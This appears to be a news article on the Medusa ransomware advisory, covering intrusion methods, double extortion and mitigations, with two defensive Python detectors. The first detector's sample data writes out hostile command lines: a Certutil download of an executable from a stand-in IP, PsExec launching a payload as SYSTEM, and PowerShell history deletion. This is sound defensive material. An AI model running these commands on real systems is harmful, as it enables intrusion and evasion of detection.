ZDNet | Security

How to guard against a vicious Medusa ransomware attack – before it’s too late

How to protect yourself and your company from the vicious Medusa ransomware

Federal authorities are warning individuals and organizations about a dangerous ransomware campaign that has recently added hundreds of victims to its count. The FBI, CISA, and MS-ISAC (the Multi-State Information Sharing and Analysis Center) have issued a joint advisory identifying the ransomware as Medusa and detailing how these attacks play out and how organizations can defend against them.

What is Medusa?

First spotted in June 2021, Medusa is a ransomware-as-a-service (RaaS) variant that targets critical infrastructure organizations, such as those in the medical, education, legal, insurance, technology, and manufacturing sectors. Under the RaaS model, the developers farm out the intrusions to affiliates who carry out the actual attacks. As of February 2025, Medusa developers and affiliates had hit more than 300 victims.

Medusa started as a closed ransomware variant, meaning that the same cybercriminals who developed the malware also carried out the attacks. Over time it has moved to an affiliate model: hired guns launch the intrusions while the developers keep control of ransom negotiations and other central functions. Developers typically recruit affiliates on dark web forums and marketplaces, offering between $100 and $1 million along with the chance to work exclusively for Medusa.

The affiliates compromise a targeted organization using one of two methods. Phishing campaigns that steal credentials are the primary approach, but the attackers also exploit unpatched software vulnerabilities to gain access to a company's resources. Once that initial foothold is gained, the criminals use a variety of tools to advance further.

Legitimate utilities such as Advanced IP Scanner and SoftPerfect Network Scanner are used to scan for vulnerable users, systems, and open ports to exploit. Built-in tools such as PowerShell and the Windows command prompt are then used to enumerate network and file resources.

The next goal is to move laterally through the network to find files that can be stolen and encrypted. For that, the attackers use remote access software such as AnyDesk, Atera, and Splashtop in combination with Remote Desktop Protocol (RDP) and PsExec. Once they hold a valid username and password, they use PsExec to run files and processes with SYSTEM-level privileges.

Throughout the attack, the criminals also need to cover their tracks and evade detection. They may abuse vulnerable or signed drivers (the bring-your-own-vulnerable-driver technique) to kill endpoint detection and response (EDR) tools. The built-in Windows utility Certutil is used to bring files onto a host without tripping detection, and the attackers may delete the PowerShell history to wipe the record of the commands they ran.
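The tooling described in the three paragraphs above is a detection opportunity, because every one of those programs leaves a process command line behind. The script below is an added example for this article, not code from the advisory or from ZDNet: it matches constructed process-creation records (shaped like Sysmon Event ID 1, with field names that are assumptions) against patterns for Certutil file ingress, PsExec run as SYSTEM, the named remote access tools and scanners, and PowerShell history wiping, then correlates hits per host. The host names, user names, IP addresses and file names in the sample data are made up.

```python
"""Match process command lines against the Medusa tradecraft described above.

Added example for this article; it is not code from the CISA/FBI advisory.
The events below are constructed to look like Sysmon Event ID 1 (process
creation) records reduced to three fields; the field names are assumptions.
"""
import re
from collections import defaultdict

# (rule name, pattern over the full command line, tradecraft it maps to)
RULES = [
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s+.*-(urlcache|decode|verifyctl)", re.I),
     "Certutil used to pull a file onto the host"),
    ("psexec_system",
     re.compile(r"psexec(64)?(\.exe)?\b.*\s-s\b", re.I),
     "PsExec launching a process as SYSTEM (-s)"),
    ("remote_access_tool",
     re.compile(r"\b(anydesk|atera|splashtop)", re.I),
     "Remote access software used alongside RDP for lateral movement"),
    ("network_scanner",
     re.compile(r"(advanced_ip_scanner|netscan)(\.exe)?", re.I),
     "Advanced IP Scanner / SoftPerfect Network Scanner run on a workstation"),
    ("powershell_history_wipe",
     re.compile(r"(clear-history|consolehost_history\.txt|historysavepath)", re.I),
     "PowerShell command history deleted to cover tracks"),
]

# Constructed sample events. The first is ordinary admin work and must not fire.
SAMPLE_EVENTS = [
    {"host": "WS-014", "user": r"CORP\jdoe",
     "cmdline": r"cmd.exe /c dir \\fileserver\share"},
    {"host": "WS-014", "user": r"CORP\jdoe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.7/update.exe C:\Users\Public\update.exe"},
    {"host": "WS-014", "user": r"CORP\jdoe",
     "cmdline": r"C:\Users\Public\netscan.exe /hide /auto:C:\Users\Public\scan.xml"},
    {"host": "WS-014", "user": r"CORP\jdoe",
     "cmdline": r"PsExec.exe \\10.10.4.22 -s -d cmd.exe /c C:\Users\Public\payload.exe"},
    {"host": "WS-014", "user": r"CORP\jdoe",
     "cmdline": r"powershell.exe -NoP -c Remove-Item (Get-PSReadLineOption).HistorySavePath -Force"},
    # A help-desk AnyDesk session on another host: a single hit, which is routine.
    {"host": "WS-030", "user": r"CORP\helpdesk",
     "cmdline": r"C:\Program Files\AnyDesk\AnyDesk.exe --service"},
]


def scan(events):
    """Return one finding per (event, rule) match."""
    findings = []
    for ev in events:
        for name, pattern, why in RULES:
            if pattern.search(ev["cmdline"]):
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "rule": name, "why": why, "cmdline": ev["cmdline"]})
    return findings


def correlate(findings, min_rules=2):
    """Group findings by host and keep hosts where at least `min_rules` distinct
    rules fired. One hit on its own (PsExec, AnyDesk) is everyday admin work;
    several of these techniques on the same host is the chain the advisory
    describes and is worth a page to the on-call analyst."""
    rules_by_host = defaultdict(set)
    for f in findings:
        rules_by_host[f["host"]].add(f["rule"])
    return {host: sorted(rules) for host, rules in rules_by_host.items()
            if len(rules) >= min_rules}


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['host']:7} {f['rule']:24} {f['why']}")
    print("hosts with multiple techniques:", correlate(hits))
```

The patterns are deliberately loose (Certutil and PsExec have plenty of legitimate uses), which is why the correlation step matters more than any single rule: in the sample data WS-014 trips four distinct rules within one user's session while WS-030's lone AnyDesk process is filtered out. In production the same logic runs over EDR or Sysmon telemetry, and the `-s` PsExec check and the history-wipe check are the two that rarely have a benign explanation.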

Double-extortion model

Like many other strains of ransomware, Medusa employs a double-extortion model: the attackers exfiltrate data before encrypting it, so they can both lock the victim out of its own files and threaten to publish the stolen copy unless the ransom is paid. Victims are told to respond to the ransom note within 48 hours; if they don't, the attackers contact them directly by phone or email.

Medusa's data leak site lists each victim's ransom demand alongside a countdown until the information is released publicly. Even before the countdown ends, Medusa advertises the stolen data for sale to interested buyers. Victims can pay $10,000 in cryptocurrency to add a day to the timer.

The group behind Medusa is tracked as Spearwing, according to a report published by Symantec earlier this month. Since early 2023, the group has listed almost 400 victims on its data leak site, and the true number is likely much higher. Attackers using Medusa have demanded ransoms ranging from $100,000 to $15 million.

How can you protect yourself from Medusa?

Given the damage Medusa and other ransomware variants cause, what can you actually do?

The joint advisory offers several mitigations, mostly geared toward organizations. Here are a few:

  1. Patch known exploited and critical security vulnerabilities, prioritizing internet-facing systems. Keep operating systems, software, and firmware patched and up to date.
  2. Segment your networks. Segmentation limits an attacker who compromises one segment or device from doing the same to the others.
  3. Filter network traffic. Restrict which accounts and source addresses can reach remote services such as RDP on internal systems, so unknown or untrusted users never get that far.
  4. Disable unused ports and services. Every port you close is one an attacker cannot reach, which shrinks the attack surface even if a service behind it is later found to be vulnerable.
  5. Set up a recovery plan to protect critical data. Keep multiple copies of sensitive or proprietary data, including offline backups, in a location that is physically separate and segmented from your primary network, and test that you can actually restore from them.
  6. Enable multifactor authentication. Require MFA for all services where possible, particularly webmail, VPNs, and any account that can access critical systems.
  7. Monitor for unusual network activity. Use tools that log and report all network traffic and alert you to abnormal behavior, including lateral movement across your network.
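Item 7 is the one most teams find hardest to act on, so here is a concrete form of it. This is an added example for this article, not code from the advisory: it takes constructed Windows Security Event ID 4624 (successful logon) records and flags any account that authenticates to many distinct hosts within a short window, which is what the PsExec- and RDP-driven lateral movement described earlier looks like in the logs. The host names, account names, timestamps and thresholds are all made up for the illustration and would need tuning in a real environment.

```python
"""Flag an account that authenticates to many hosts in a short window.

Added example for the "monitor for lateral movement" item above; it is not
code from the advisory. The records are constructed Windows Security
Event ID 4624 (successful logon) entries reduced to the fields that matter:
timestamp, target host, account, logon type. Type 3 (network, the kind
PsExec and SMB produce) and type 10 (RemoteInteractive, i.e. RDP) are the
types lateral movement generates; interactive type 2 logons are ignored.
"""
from collections import defaultdict
from datetime import datetime, timedelta

LATERAL_LOGON_TYPES = {3, 10}

# Constructed sample: one account sweeps seven hosts in under a minute,
# one user does normal desk work plus a single RDP session, and help desk
# touches three machines over an hour.
SAMPLE_LOGONS = [
    # (timestamp, target host, account, logon type)
    ("2025-03-10T02:14:05", "FS-01",  r"CORP\ops_admin", 3),
    ("2025-03-10T02:14:09", "FS-02",  r"CORP\ops_admin", 3),
    ("2025-03-10T02:14:12", "WS-014", r"CORP\ops_admin", 3),
    ("2025-03-10T02:14:20", "WS-015", r"CORP\ops_admin", 3),
    ("2025-03-10T02:14:31", "WS-016", r"CORP\ops_admin", 3),
    ("2025-03-10T02:14:44", "SQL-01", r"CORP\ops_admin", 3),
    ("2025-03-10T02:15:02", "DC-01",  r"CORP\ops_admin", 3),
    ("2025-03-10T09:01:10", "WS-014", r"CORP\jdoe", 2),
    ("2025-03-10T09:30:00", "TS-01",  r"CORP\jdoe", 10),
    ("2025-03-10T10:00:00", "WS-020", r"CORP\helpdesk", 3),
    ("2025-03-10T10:25:00", "WS-021", r"CORP\helpdesk", 3),
    ("2025-03-10T11:10:00", "WS-022", r"CORP\helpdesk", 3),
]


def fan_out(logons, window_minutes=10, min_hosts=5):
    """Return {account: sorted hosts} for every account that reached at least
    `min_hosts` distinct hosts within any span of `window_minutes`.

    The thresholds are assumptions to tune per environment, and accounts that
    legitimately touch every machine (backup, vulnerability scanning, patching)
    need an explicit allow-list rather than a higher threshold.
    """
    window = timedelta(minutes=window_minutes)
    by_account = defaultdict(list)
    for ts, host, account, logon_type in logons:
        if logon_type in LATERAL_LOGON_TYPES:
            by_account[account].append((datetime.fromisoformat(ts), host))

    alerts = {}
    for account, events in by_account.items():
        events.sort()
        best, start = set(), 0
        for end in range(len(events)):
            # Advance the window start until the span fits in window_minutes.
            while events[end][0] - events[start][0] > window:
                start += 1
            hosts = {host for _, host in events[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            alerts[account] = sorted(best)
    return alerts


if __name__ == "__main__":
    for account, hosts in fan_out(SAMPLE_LOGONS).items():
        print(f"{account}: {len(hosts)} hosts in 10 min -> {', '.join(hosts)}")
```

Run as-is it reports only the `ops_admin` sweep; the help-desk logons fall outside the ten-minute window and the user's single RDP session never reaches the host threshold. The same fan-out logic applies to 4648 (explicit credential) and 4776 (NTLM validation) events, and pairing it with the process-based rules from the earlier example, so that the account sweeping hosts is also the one running PsExec with `-s`, gives a much higher-confidence alert than either signal alone.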